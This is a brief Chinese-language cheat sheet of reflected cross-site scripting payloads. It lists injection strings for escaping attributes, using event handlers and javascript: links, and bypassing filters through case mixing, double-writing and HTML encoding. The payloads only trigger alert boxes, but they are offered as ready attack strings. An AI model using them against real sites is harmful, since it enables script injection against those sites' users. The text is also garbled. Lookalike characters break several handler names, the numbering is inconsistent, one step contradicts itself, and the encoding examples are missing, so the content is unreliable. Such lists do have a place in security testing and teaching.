Xss反射型常用语法:
- 普通语法: <script>alert(1)</script>
- 构造闭合语法: "><script>alert(1)</script>
- 当引号被转义时的语法: 1' οnclick='alert(2)' 再次点击输入框时就会出现弹窗
- 当3.的双引号不行时则考虑使用双引号:1 "onclick"=alert(2)
- 当</>被过滤时便不能用标签可以考虑使用出发事件: 1" οnmοuseοver="alert(1)"
- 当5.的双引号不行时则考虑使用单引号: 1' οnmοuseοver='alert(1)'
- 当上述几种都不行时可以考虑使用a标签:11"><a href="javascript:alert(1)">
- 大小写绕过:11"><a HREF="javascript:alert(1)"> "><sCript>alert(1)</scRipt>
<SCRIPT>alert(1)</SCRIPT>
9.双写绕过:"><SCRSCRIPTIPT>alert(/xss/)</SCRSCRIPTIPT>
10.Html编码绕过:
javaSCRIPT:alert(1)
这里属于直接编码所所有的进行
把所需要过滤的字段进行html编码就可以进行绕过,这里绕过的时比如
href href
SCRIPT SCRIPT